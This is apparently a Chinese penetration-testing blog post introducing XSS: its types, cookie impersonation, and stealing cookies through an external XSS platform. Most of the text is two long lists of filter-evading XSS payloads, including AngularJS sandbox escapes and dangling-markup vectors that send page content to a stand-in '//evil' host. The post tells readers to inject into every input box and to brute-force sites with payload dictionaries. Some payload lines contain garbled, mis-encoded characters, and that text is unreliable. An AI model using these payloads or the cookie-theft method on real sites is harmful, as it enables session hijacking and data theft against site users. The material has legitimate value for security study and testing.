渗透测试基础-XSS漏洞简析
2024-05-13 09:11:53
目录
XSS原理
XSS漏洞的危害
XSS的种类
常见XSS利用代码集合
burpXssPayload
easyXssPayload
markdown-xss-payload
XSS原理
当你拿到一个网站的时候,你们能够输入的地方:
1.网站提供的框框
2.网址的参数的值
XSS原理:我们在一个网站上,输入【前端代码】,如果这个网站将我们的前端代码执行了,那么就说明这儿存在XSS漏洞。
前端代码:HTML、CSS、Javascript
<a target="_blank" href="//app.jd.com/">手机京东</a> # 前端代码,作用:跳转网页的。
乱插一通。
在后台点击手机京东会直接跳转。
<script>alert(/XSS/)</script> # 前端代码,作用:弹框的。
ps:xss的小技巧:见框就插
ps:真实网站的时候,挖XSS不一定手测,可以直接工具爆破。需要好的字典。
XSS漏洞的危害
XSS漏洞的危害取决与Javascript。
1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号。
2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力。
3、盗窃企业重要的具有商业价值的资料。
4、非法转账。
5、强制发送电子邮件(钓鱼)。
6、网站挂马。
7、控制受害者机器(肉鸡)向其它网站发起攻击 。
XSS的种类
反射型XSS:核心:非持久型。
这个漏洞是需要配合社工的。骗别人去触发你的XSS攻击。你插入代码就能触发攻击,你不插入就触发不了。
点击手机京东会直接跳转。
下次刷新会直接消失。
存储型XSS:核心:持久型。
你插入的代码直接插到数据库里面,这样就会导致正常用户,每一次访问数据库的时候,都会中XSS攻击。
ps:你要挖掘一个存储型的XSS,一定不要用弹框。
<script>console.log(1)</script> # 前端代码,作用:是在F12中显示1。
网站将我们的前端代码执行,说明这存在XSS漏洞。
DOM型XSS
cookie
什么是cookie?
指某些网站为了辨别用户身份、进行 session跟踪而储存在用户本地终端上的数据(通常经过加密)
简单地说,当用户使用浏览器访问一个支持Cookie的网站的时候,
用户会提供包括用户名在内的个人信息并且提交至服务器,服务器回传给用户这段个人信息的加密版本,这些信息并不存放在HTTP响应体(Response Body)中,而存放于HTTP响应头(Response Header)。
cookie = 网站用户身份
cookie,作用:当你拿到某个网站用户的cookie之后,那么你就可以冒充那个网站用户。
以杰斯管理员为例。
抓包获取杰斯cookie。
当切回普通用户时登录后台遭拒绝。
抓包将自己cookie改为杰斯cookie。
成功进入后台登陆页面。
XSS漏洞利用:
任何漏洞的利用, 核心:将payload(漏洞利用代码)插到存在漏洞的地方。
一个xss漏洞平台:
https://xss8.cc/bdstatic.com/
cookie是会过期的。
无keepsession:过期就过期了,平台不管了。
keepsession:尽力维持cookie不过期。
获取测试代码。
插入代码。
查看结果。
cookie是flag=zkz{xsser-g00d}。
半个小时不操作网站,再次操作网站就要重新登陆···
常见XSS利用代码集合
burpXssPayload
<a id=x tabindex=1 onactivate=alert(1)></a><body onafterprint=alert(2)><style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(3)"></a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(4)"></a><style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(5)"></a><style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(6)"></a><a id=x tabindex=1 onbeforeactivate=alert(7)></a><a id=x tabindex=1 onbeforedeactivate=alert(8)></a><input autofocus><body onbeforeprint=alert(9)><body onbeforeunload="location='javascript:alert(10)'"><svg><animate onbegin=alert(11) attributeName=x dur=1s><a onblur=alert(12) tabindex=1 id=x></a><input autofocus><marquee width=1 loop=1 onbounce=alert(13)>XSS</marquee><audio oncanplay=alert(14)><source src="validaudio.wav" type="audio/wav"></audio><video oncanplaythrough=alert(15)><source src="validvideo.mp4" type="video/mp4"></video><a id=x tabindex=1 ondeactivate=alert(16)></a><input id=y autofocus><svg><animate onend=alert(17) attributeName=x dur=1s><audio controls autoplay onended=alert(18)><source src="validaudio.wav" type="audio/wav"></audio><audio src/onerror=alert(19)><marquee width=1 loop=1 onfinish=alert(20)>XSS</marquee><a id=x tabindex=1 onfocus=alert(21)></a><a id=x tabindex=1 onfocusin=alert(22)></a><a onfocusout=alert(23) tabindex=1 id=x></a><input autofocus><body onhashchange="alert(24)"><svg><a onload=alert(25)></a><audio onloadeddata=alert(26)><source src="validaudio.wav" type="audio/wav"></audio><audio autoplay onloadedmetadata=alert(27)> <source src="validaudio.wav" type="audio/wav"></audio><image src=validimage.png onloadend=alert(28)><image src=validimage.png onloadstart=alert(29)><body onmessage=alert(30)><body onpageshow=alert(31)><audio autoplay onplay=alert(32)><source src="validaudio.wav" type="audio/wav"></audio><audio autoplay onplaying=alert(33)><source src="validaudio.wav" type="audio/wav"></audio><body onpopstate=alert(34)><applet onreadystatechange=alert(35)></applet><svg><animate onrepeat=alert(36) attributeName=x dur=1s repeatCount=2 /><body onresize="alert(37)"><body onscroll=alert(38)><div style=height:1000px></div><div id=x></div><marquee onstart=alert(39)>XSS</marquee><audio controls autoplay ontimeupdate=alert(40)><source src="validaudio.wav" type="audio/wav"></audio><details ontoggle=alert(41) open>test</details><style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(42)></a><style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(43)></a><style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(44)></a><body onunhandledrejection=alert(45)><script>fetch('//xyz')</script><video autoplay controls onwaiting=alert(46)><source src="validvideo.mp4" type=video/mp4></video><input onauxclick=alert(47)><a onbeforecopy="alert(48)" contenteditable>test</a><a onbeforecut="alert(49)" contenteditable>test</a><a onbeforepaste="alert(50)" contenteditable>test</a><input onchange=alert(51) value=xss><a onclick="alert(52)">test</a><a oncontextmenu="alert(53)">test</a><a oncopy="alert(54)" contenteditable>test</a><a oncut="alert(55)" contenteditable>test</a><a ondblclick="alert(56)">test</a><a draggable="true" ondrag="alert(57)">test</a><a draggable="true" ondragend="alert(58)">test</a><a draggable="true" ondragenter="alert(59)">test</a><a draggable="true" ondragleave="alert(60)">test</a><div draggable="true" contenteditable>drag me</div><a ondragover=alert(61) contenteditable>drop here</a><a draggable="true" ondragstart="alert(62)">test</a><div draggable="true" contenteditable>drag me</div><a ondrop=alert(63) contenteditable>drop here</a><input oninput=alert(64) value=xss><form><input oninvalid=alert(65) required><input type=submit><a onkeydown="alert(66)" contenteditable>test</a><a onkeypress="alert(67)" contenteditable>test</a><a onkeyup="alert(68)" contenteditable>test</a><a onmousedown="alert(69)">test</a><a onmouseenter="alert(70)">test</a><a onmouseleave="alert(71)">test</a><a onmousemove="alert(72)">test</a><a onmouseout="alert(73)">test</a><a onmouseover="alert(74)">test</a><a onmouseup="alert(75)">test</a><a onpaste="alert(76)" contenteditable>test</a><audio autoplay controls onpause=alert(77)><source src="validaudio.wav" type="audio/wav"></audio><form onreset=alert(78)><input type=reset><form><input type=search onsearch=alert(79) value="Hit return" autofocus><audio autoplay controls onseeked=alert(80)><source src="validaudio.wav" type="audio/wav"></audio><audio autoplay controls onseeking=alert(81)><source src="validaudio.wav" type="audio/wav"></audio><input onselect=alert(82) value="XSS" autofocus><form onsubmit=alert(83)><input type=submit><svg onunload=window.open('javascript:alert(84)')><audio autoplay controls onvolumechange=alert(85)><source src="validaudio.wav" type="audio/wav"></audio><body onwheel=alert(86)><script>onerror=alert;throw 1</script><script>{onerror=alert}throw 1</script><script>throw onerror=alert,1</script><script>throw onerror=eval,'=alert\x281\x29'</script><script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script><script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script><script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script><script>location='javascript:alert\x281\x29'</script><script>location=name</script><script>alert`1`</script><xss class=progress-bar-animated onanimationstart=alert(97)><xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(98)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss><iframe src="javascript:alert(99)"><object data="javascript:alert(100)"><embed src="javascript:alert(101)"><a href="javascript:alert(102)">XSS</a><a href="JaVaScript:alert(103)">XSS</a><a href=" javascript:alert(104)">XSS</a><a href="javas cript:alert(105)">XSS</a><svg><a xlink:href="javascript:alert(106)"><text x="20" y="20">XSS</text></a><svg><animate xlink:href=#xss attributeName=href values=javascript:alert(107) /><a id=xss><text x=20 y=20>XSS</text></a><svg><animate xlink:href=#xss attributeName=href from=javascript:alert(108) to=1 /><a id=xss><text x=20 y=20>XSS</text></a><svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(109) /><a id=xss><text x=20 y=20>XSS</text></a><script src="data:text/javascript,alert(110)"></script><svg><script href="data:text/javascript,alert(111)" /><svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(112)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg><script>import('data:text/javascript,alert(113)')</script><base href="javascript:/a/-alert(114)///"><a href=../lol/safari.html>test</a><math><x href="javascript:alert(115)">blah<form><button formaction=javascript:alert(116)>XSS<form><input type=submit formaction=javascript:alert(117) value=XSS><form action=javascript:alert(118)><input type=submit value=XSS><isindex type=submit formaction=javascript:alert(119)><isindex type=submit action=javascript:alert(120)><svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg><iframe srcdoc="<img src=1 onerror=alert(122)>"></iframe><iframe srcdoc="<img src=1 onerror=alert(123)>"></iframe><form action="javascript:alert(124)"><input type=submit id=x></form><label for=x>XSS</label><input type="hidden" accesskey="X" onclick="alert(125)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)<link rel="canonical" accesskey="X" onclick="alert(126)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)<a href=# download="filename.html">Test</a><img referrerpolicy="no-referrer" src="//portswigger-labs.net"><meta http-equiv="refresh" content="0; url=//portswigger-labs.net"><meta charset="UTF-7" /> +ADw-script+AD4-alert(130)+ADw-/script+AD4-<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(131)+ADw-/script+AD4-<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"><iframe sandbox src="//portswigger-labs.net"></iframe><meta name="referrer" content="no-referrer"><script>\u0061lert(1)</script><script>\u{61}lert(1)</script><script>\u{0000000061}lert(1)</script><script>eval('\x61lert(1)')</script><a href="javascript:alert(139)">XSS</a><a href="javascript:alert(139)">XSS</a><a href="javascript:alert(140)">XSS</a><a href="javascript:alert(141)">XSS</a><a href="javascript:alert(142)">XSS</a><a href="javascript:alert(143)">XSS</a><a href="javascript:x='%27-alert(144)-%27';">XSS</a><a href="javascript:x='%27-alert(145)-%27';">XSS</a><a href="javascript& #x6a;avascript:alert(146)">Firefox</a><a href="javascript& colon ;alert(147)">Firefox</a><script src=data:text/javascript;base64,YWxlcnQoMSk=></script>{{constructor.constructor('alert(149)')()}}{{$on.constructor('alert(150)')()}}{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(151)')()}}{{{}.")));alert(152)//"}}{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(153)')()}}{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(154)"].sort(toString.constructor);}}{{{}.")));alert(155)//"}}{{{}.")));alert(156)//"}}{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(157)//');}}{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(158)//');}}{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(159)');}}{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(160)//');}}{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(161)');}}{{constructor.constructor('alert(162)')()}}{{$on.constructor('alert(163)')()}}constructor.constructor('alert(164)')()a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(165)')()toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(166)"].sort(toString.constructor){}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(167)')(){}.")));alert(168)//";'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(169)//';constructor.constructor('alert(170)')()toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'"><input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'><input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'"><div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div><link rel=stylesheet href="//evil?<link rel=icon href="//evil?<meta http-equiv="refresh" content="0; http://evil?<video><track default src="//evil?<video><source src="//evil?<audio><source src="//evil?<input type=image src="//evil?<form><button style="width:100%;height:100%" type=submit formaction="//evil?<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?<button form=x style="width:100%;height:100%;"><form id=x action="//evil?<isindex type=image src="//evil?<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?<object data="//evil?<iframe src="//evil?<embed src="//evil?<form><button formaction=//evil>XSS</button><textarea name=x><button form=x>XSS</button><form id=x action=//evil target='<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(200)//'><img src="javascript:alert(201)"><body background="javascript:alert(202)"><iframe src="data:text/html,<img src=1 onerror=alert(203)>"><a title="&{alert(204)}">XSS</a><link href="xss.js" rel=stylesheet type="text/javascript"><form><button name=x formaction=x><b>stealme<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script><img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" /><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(209)">XSS</a><HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(210)>"> </BODY></HTML>
easyXssPayload
<script>alert(1)</script>
<script>alert(2)</script>
medium--> ˫дÈƹý£º<sc<script>ript>alert(4)</script>´óСд»ìÏýÈƹý£º<ScRipt>alert(5)</script><img src=1 onerror=alert(7)>
onmouseover=¡¯alert(9)¡¯
<script>alert(11);</script>
>"'><img src="javascript.:alert(12)">
>"'><script>alert(13)</script>
<table background='javascript.:alert(14)'></table>
<object type=text/html data='javascript.:alert(15);'></object>
"+alert(16)+"
<body/onfocus=top.alert(17)>
<img/src=22 onerror=window.alert(22)>
<img src=62 onerror=(function(){alert(62)})()>
<img src=63 onerror=!function(){alert(63)}()>
<img src=64 onerror=%2bfunction(){alert(64)}()>
<img src=65 onerror=%2dfunction(){alert(65)}()>
<img src=66 onerror=~function(){alert(66)}()>
<a href="javascript:`${alert(69)}`">XSS Test</a>
<a href="javascript:[''].findIndex(alert(71)">XSS Test</a>
<iframe onload=location=['javascript:alert(79)'].join(")>
<a href="javascript:(new Function('alert(80))()">XSS Test</a>
<body/onload=Function(alert(81))()>
<img%0Dsrc=82 onerror=Function(alert(82))>
<a href="javascript:(new (Object.getPrototypeOf(async function(){}).constructor)('alert(84))()">XSS Test</a>
<body/onload=eval(location.hash.slice(85))>#alert(85)
<body/onload=setTimeout(location.hash.substr(86))()>#alert(86)
<body/onload=Set.constructor(location.hash.substr(87))()>#alert(87)
<body/onload=execScript(location.hash.substr(88))>#alert(88)
<body/onload=Function(location.hash.slice(90))()>#alert(90)
<svg/onload=alert(91)
<svg onload=eval(URL.slice(-8))>#alert(93)
<body/onload=eval(location.hash.slice(94))>#javascript:alert(94)
<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(97)">
<img src=101 onerror=location="javascript:alert(101)">
<svg/onload="javascript:alert(103)" xmlns="http://www.baidu.com">
<svg/onload=location='javascript:/*'%2blocation.hash> #*/alert(105)
<svg/onload=location="javascript:"%2binnerHTML%2blocation.hash>" #"-alert(107)
<svg/onload=with(location)with(hash)eval(alert(109))>
<body onload=alert(140)>
<body onpageshow=alert(141)>
<body onfocus=alert(142)>
<body onhashchange=alert(143)><a href=#></a>
<body style=overflow:auto;height:144000px onscroll=alert(144) id=x>#x
<body onscroll=alert(145)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<marquee onstart=alert(146)>
<marquee loop=147 width=0 onfinish=alert(147)>
<audio src onloadstart=alert(148)>
<video onloadstart=alert(149)><source>
<input autofocus onblur=alert(150)>
<keygen autofocus onfocus=alert(151)>
<form onsubmit=alert(152)><input type=submit>
<select onchange=alert(153)><option>153<option>2
<menu id=x contextmenu=x onshow=alert(154)>right click me!
<x contenteditable onblur=alert(155)>lose focus!
<x onclick=alert(156)>click this!
<x oncopy=alert(157)>copy this!
<x oncontextmenu=alert(158)>right click this!
<x oncut=alert(159)>copy this!
<x ondblclick=alert(160)>double click this!
<x ondrag=alert(161)>drag this!
<x contenteditable onfocus=alert(162)>focus this!
<x contenteditable oninput=alert(163)>input here!
<x contenteditable onkeydown=alert(164)>press any key!
<x contenteditable onkeypress=alert(165)>press any key!
<x contenteditable onkeyup=alert(166)>press any key!
<x onmousedown=alert(167)>click this!
<x onmousemove=alert(168)>hover this!
<x onmouseout=alert(169)>hover this!
<x onmouseover=alert(170)>hover this!
<x onmouseup=alert(171)>click this!
<x contenteditable onpaste=alert(172)>paste here!
<brute contenteditable onblur=alert(173)>lose focus!
<brute onclick=alert(174)>click this!
<brute oncopy=alert(175)>copy this!
<brute oncontextmenu=alert(176)>right click this!
<brute oncut=alert(177)>copy this!
<brute ondblclick=alert(178)>double click this!
<brute ondrag=alert(179)>drag this!
<brute contenteditable onfocus=alert(180)>focus this!
<brute contenteditable oninput=alert(181)>input here!
<brute contenteditable onkeydown=alert(182)>press any key!
<brute contenteditable onkeypress=alert(183)>press any key!
<brute contenteditable onkeyup=alert(184)>press any key!
<brute onmousedown=alert(185)>click this!
<brute onmousemove=alert(186)>hover this!
<brute onmouseout=alert(187)>hover this!
<brute onmouseover=alert(188)>hover this!
<brute onmouseup=alert(189)>click this!
<brute contenteditable onpaste=alert(190)>paste here!
<brute style=font-size:500px onmouseover=alert(191)>0000
<brute style=font-size:500px onmouseover=alert(192)>000192
<brute style=font-size:500px onmouseover=alert(193)>0002
<brute style=font-size:500px onmouseover=alert(194)>0003
<script src=javascript:alert(196)>
<iframe src=javascript:alert(197)>
<embed src=javascript:alert(198)>
<a href=javascript:alert(200)>click
<math><brute href=javascript:alert(201)>click
<form action=javascript:alert(203)><input type=submit>
<isindex action=javascript:alert(204) type=submit value=click>
<form><button formaction=javascript:alert(206)>click
<form><input formaction=javascript:alert(207) type=submit value=click>
<form><input formaction=javascript:alert(208) type=image value=click>
<form><input formaction=javascript:alert(209) type=image src=http://brutelogic.com.br/webgun/img/youtube209.jpg>
<isindex formaction=javascript:alert(210) type=submit value=click>
<object data=javascript:alert(212)>
<svg><script xlink:href=data:,alert(216)></script>
<svg><script xlink:href=data:,alert(217) />
<math><brute xlink:href=javascript:alert(218)>click
<svg><a xmlns:xlink=http://www.w3.org/220999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(220) to=%26>
'><script>alert(221)</script>
='><script>alert(222)</script>
<script>alert(223)</script>
<script>alert(224)</script>
<script>alert(225)</script>
<img src="javascript:alert(226)">
%0a%0a<script>alert(227)</script>.jsp
%3c/a%3e%3cscript%3ealert(228)%3c/script%3e
%3c/title%3e%3cscript%3ealert(229)%3c/script%3e
%3cscript%3ealert(230)%3c/script%3e/index.html
<script>alert(231)</script>
a.jsp/<script>alert(232)</script>
"><script>alert(233)</script>
<IMG SRC="javascript.:alert(234);">
<IMG SRC="jav	ascript.:alert(238);">
<IMG SRC="jav
ascript.:alert(239);">
<IMG SRC="jav
ascript.:alert(240);">
"<IMG src="/java"\0script.:alert(241)>";'>out
<IMG SRC=" javascript.:alert(242);">
<SCRIPT>a=/XSS/alert(243)</SCRIPT>
<BODY BACKGROUND="javascript.:alert(244)">
<BODY ONLOAD=alert(245)>
<IMG DYNSRC="javascript.:alert(246)">
<IMG LOWSRC="javascript.:alert(247)">
<BGSOUND SRC="javascript.:alert(248);">
<br size="&{alert(249)}">
<LINK REL="stylesheet"HREF="javascript.:alert(251);">
<META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert(253);">
<TABLE BACKGROUND="javascript.:alert(256)">
<DIV STYLE="background-image: url(javascript.:alert(257))">
<DIV STYLE="width: expression(alert(259));">
<STYLE>@im\port'\ja\vasc\ript:alert(260)';</STYLE>
<IMG STYLE='xss:expre\ssion(alert(261))'>
<STYLE. TYPE="text/javascript">alert(262);</STYLE>
<STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert(263)");}</STYLE><A CLASS=XSS></A>
<STYLE. type="text/css">BODY{background:url("javascript.:alert(264)")}</STYLE>
<BASE HREF="javascript.:alert(265);//">
getURL("javascript.:alert(266)")
a="get";b="URL";c="javascript.:";d="alert(267);";eval(a+b+c+d);
<XML SRC="javascript.:alert(268);">
"> <BODY NLOAD="a();"><SCRIPT>function a(){alert(269);}</SCRIPT><"
<IMG SRC="javascript.:alert(271)"
<script\x20type="text/javascript">javascript:alert(278);</script>
<script\x3Etype="text/javascript">javascript:alert(279);</script>
<script\x0Dtype="text/javascript">javascript:alert(280);</script>
<script\x09type="text/javascript">javascript:alert(281);</script>
<script\x0Ctype="text/javascript">javascript:alert(282);</script>
<script\x2Ftype="text/javascript">javascript:alert(283);</script>
<script\x0Atype="text/javascript">javascript:alert(284);</script>
'`"><\x3Cscript>javascript:alert(285)</script>
'`"><\x00script>javascript:alert(286)</script>
<img src=287 href=287 onerror="javascript:alert(287)"></img>
<audio src=288 href=288 onerror="javascript:alert(288)"></audio>
<video src=289 href=289 onerror="javascript:alert(289)"></video>
<body src=290 href=290 onerror="javascript:alert(290)"></body>
<image src=291 href=291 onerror="javascript:alert(291)"></image>
<object src=292 href=292 onerror="javascript:alert(292)"></object>
<script src=293 href=293 onerror="javascript:alert(293)"></script>
<svg onResize svg onResize="javascript:javascript:alert(294)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(295)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(296)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(297)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(298)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(299)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(300)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(301)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(302)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(303)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(304)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(305)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(306)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(307)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(308)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(309)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(310)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(311)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(312)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(313)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(314)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(315)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(316)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(317)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(318)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(319)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(320)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(321)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(322)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(323)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(324)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(325)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(326)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(327)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(328)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(329)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(330)"></body onResize>
<object onError object onError="javascript:javascript:alert(331)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(332)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(333)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(334)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(335)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(336)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(337)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(338)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(339)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(340)"></iframe onload>
<body onload body onload="javascript:javascript:alert(341)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(342)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(343)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(344)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(345)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(346)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(347)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(348)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(349)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(350)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(351)"></body onblur>
\x3Cscript>javascript:alert(352)</script>
'"`><script>/* *\x2Fjavascript:alert(353)// */</script>
<script>javascript:alert(354)</script\x0D
<script>javascript:alert(355)</script\x0A
<script>javascript:alert(356)</script\x0B
<script charset="\x22>javascript:alert(357)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(358)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(359)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(360)> -->
--><!-- --\x2361> <img src=xxx:x onerror=javascript:alert(361)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(362)> -->
`"'><img src='#\x27 onerror=javascript:alert(363)>
<a href="javascript\x3Ajavascript:alert(364)" id="fuzzelement364">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(365)//';</script></p>
<a href="javas\x00cript:javascript:alert(366)" id="fuzzelement366">test</a>
<a href="javas\x07cript:javascript:alert(367)" id="fuzzelement367">test</a>
<a href="javas\x0Dcript:javascript:alert(368)" id="fuzzelement368">test</a>
